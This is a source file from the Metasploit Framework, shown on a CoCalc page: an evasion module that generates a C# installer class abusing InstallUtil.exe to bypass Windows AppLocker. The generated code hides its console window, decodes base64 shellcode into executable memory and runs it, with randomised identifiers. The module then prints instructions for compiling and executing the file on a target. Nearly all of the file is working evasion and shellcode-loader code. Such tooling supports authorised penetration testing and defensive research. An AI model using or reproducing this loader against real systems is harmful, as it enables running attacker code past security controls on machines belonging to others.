CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/evasion/windows/applocker_evasion_install_util.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Evasion

7


8
  def initialize(info={})

9
    super(update_info(info,

10
      'Name'        => 'Applocker Evasion - .NET Framework Installation Utility',

11
      'Description' => %q(

12
         This module will assist you in evading Microsoft Windows

13
         Applocker and Software Restriction Policies.

14
         This technique utilises the Microsoft signed binary

15
         InstallUtil.exe to execute user supplied code.

16
      ),

17
      'Author'      =>

18
        [

19
          'Nick Tyrer <@NickTyrer>', # module development

20
          'Casey Smith' # install_util bypass research

21
        ],

22
      'License'     => 'MSF_LICENSE',

23
      'Platform'    => 'win',

24
      'Arch'        => [ARCH_X86, ARCH_X64],

25
      'Targets'     => [['Microsoft Windows', {}]],

26
      'References'  => [['URL', 'https://attack.mitre.org/techniques/T1118/']]

27
      )

28
    )

29


30
    register_options(

31
      [

32
        OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt'])

33
      ]

34
    )

35
  end

36


37
  def build_payload

38
    Rex::Text.encode_base64(payload.encoded)

39
  end

40


41
  def obfu

42
    Rex::Text.rand_text_alpha 8

43
  end

44


45
  def install_util

46
    esc = build_payload

47
    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]

48
    <<~HEREDOC

49
      using System;

50
      namespace #{mod[12]}

51
      {

52
      public class #{mod[11]} { public static void Main() { } }

53
      [System.ComponentModel.RunInstaller(true)]

54
      public class #{mod[10]} : System.Configuration.Install.Installer

55
      {

56
      private static Int32 #{mod[0]}=0x1000;

57
      private static IntPtr #{mod[1]}=(IntPtr)0x40;

58
      private static UInt32 #{mod[2]} = 0xFFFFFFFF;

59
      [System.Runtime.InteropServices.DllImport("kernel32")]

60
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

61
      [System.Runtime.InteropServices.DllImport("kernel32")]

62
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

63
      [System.Runtime.InteropServices.DllImport("kernel32")]

64
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

65
      [System.Runtime.InteropServices.DllImport("user32.dll")]

66
      static extern bool ShowWindow(IntPtr #{mod[3]}, int nCmdShow);

67
      [System.Runtime.InteropServices.DllImport("Kernel32")]

68
      private static extern IntPtr GetConsoleWindow();

69
      const int #{mod[4]} = 0;

70
      public override void Uninstall(System.Collections.IDictionary s)

71
      {

72
      IntPtr #{mod[3]};

73
      #{mod[3]} = GetConsoleWindow();

74
      ShowWindow(#{mod[3]}, #{mod[4]});

75
      string #{mod[5]} = "#{esc}";

76
      byte[] #{mod[6]} = Convert.FromBase64String(#{mod[5]});

77
      byte[] #{mod[7]} = #{mod[6]};

78
      IntPtr #{mod[8]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[7]}.Length, #{mod[0]}, #{mod[1]});

79
      System.Runtime.InteropServices.Marshal.Copy(#{mod[7]}, 0, #{mod[8]}, #{mod[7]}.Length);

80
      IntPtr #{mod[9]} = IntPtr.Zero;

81
      WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[8]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[2]});

82
      }

83
      }

84
      }

85
    HEREDOC

86
  end

87


88
  def file_format_filename(name = '')

89
    name.empty? ? @fname : @fname = name

90
  end

91


92
  def create_files

93
    f1 = datastore['FILENAME'].empty? ? 'install_util.txt' : datastore['FILENAME']

94
    f1 << '.txt' unless f1.downcase.end_with?('.txt')

95
    file1 = install_util

96
    file_format_filename(f1)

97
    file_create(file1)

98
  end

99


100
  def instructions

101
    print_status "Copy #{datastore['FILENAME']} to the target"

102
    if payload.arch.first == ARCH_X86

103
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:#{datastore['FILENAME'].gsub('.txt', '.exe')} #{datastore['FILENAME']}"

104
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{datastore['FILENAME'].gsub('.txt', '.exe')}"

105
    else

106
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:#{datastore['FILENAME'].gsub('.txt', '.exe')} #{datastore['FILENAME']}"

107
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{datastore['FILENAME'].gsub('.txt', '.exe')}"

108
    end

109
  end

110


111
  def run

112
    create_files

113
    instructions

114
  end

115
end

116


117